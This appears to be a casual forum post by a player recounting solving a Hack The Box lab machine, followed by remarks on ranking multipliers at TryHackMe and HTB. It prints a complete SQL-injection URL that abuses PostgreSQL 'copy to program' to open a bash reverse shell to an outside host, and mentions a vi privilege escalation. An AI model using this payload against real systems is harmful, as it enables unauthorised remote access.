I just fucked around until I realized i could move files. then i deployed a payload (http://10.129.137.16/dashboard.php?search=%25'%3B+copy+(select+'')+to+program+'bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.191/4444+0>%261"'%3B--), spawned a shell, used the vi vulnerability, and FINALLY because it took me 34 fucking minutes, FINALLY got the flags

A comical problem that THM had when they switched to a similar system was that new users could chain together easy rooms for insane multipliers to rapidly pass extremely active users who had mostly run out of rooms.
Here's hoping that HTB doesn't have a similar issue :p
